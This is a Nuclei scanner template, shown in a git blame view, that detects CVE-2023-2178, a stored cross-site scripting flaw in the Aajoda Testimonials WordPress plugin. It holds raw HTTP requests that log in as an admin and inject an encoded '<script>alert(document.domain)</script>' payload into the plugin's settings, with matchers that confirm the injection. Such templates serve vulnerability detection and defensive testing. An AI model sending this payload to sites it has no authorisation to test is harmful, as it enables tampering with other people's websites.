nuclei-templates/http/cves/2023/CVE-2023-2178.yaml

56 lines
2.4 KiB
YAML
Raw Normal View History

2023-07-25 05:58:16 +00:00
id: CVE-2023-2178
info:
name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
author: Farish
severity: medium
description: |
The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:43:37 +00:00
remediation: |
Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
2023-07-25 05:58:16 +00:00
reference:
- https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
- https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
- https://nvd.nist.gov/vuln/detail/CVE-2023-2178
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
2023-07-25 05:58:16 +00:00
cve-id: CVE-2023-2178
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
epss-score: 0.00078
epss-percentile: 0.32708
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
2023-07-25 05:58:16 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: aajoda
product: aajoda_testimonials
2023-09-06 11:43:37 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated,aajoda
2023-07-25 05:58:16 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-07-25 05:59:28 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
2023-07-25 05:58:16 +00:00
- |
POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
2023-08-07 15:57:41 +00:00
- 'contains(header_2, "text/html")'
2023-07-25 05:58:16 +00:00
- 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
- 'contains(body_2, "page_aajoda-testimonials")'
condition: and
# digest: 4b0a00483046022100cfb58ea3be8a9772943669ad1b1fa9ca02fde55e5b5eb56e5baf0dfc83326d5d022100af744a7fbbd58a6f6d988e2a5bcb9d64aaf4d92fb7d375993458af34b6095774:922c64590222798bb761d5b6d8e72950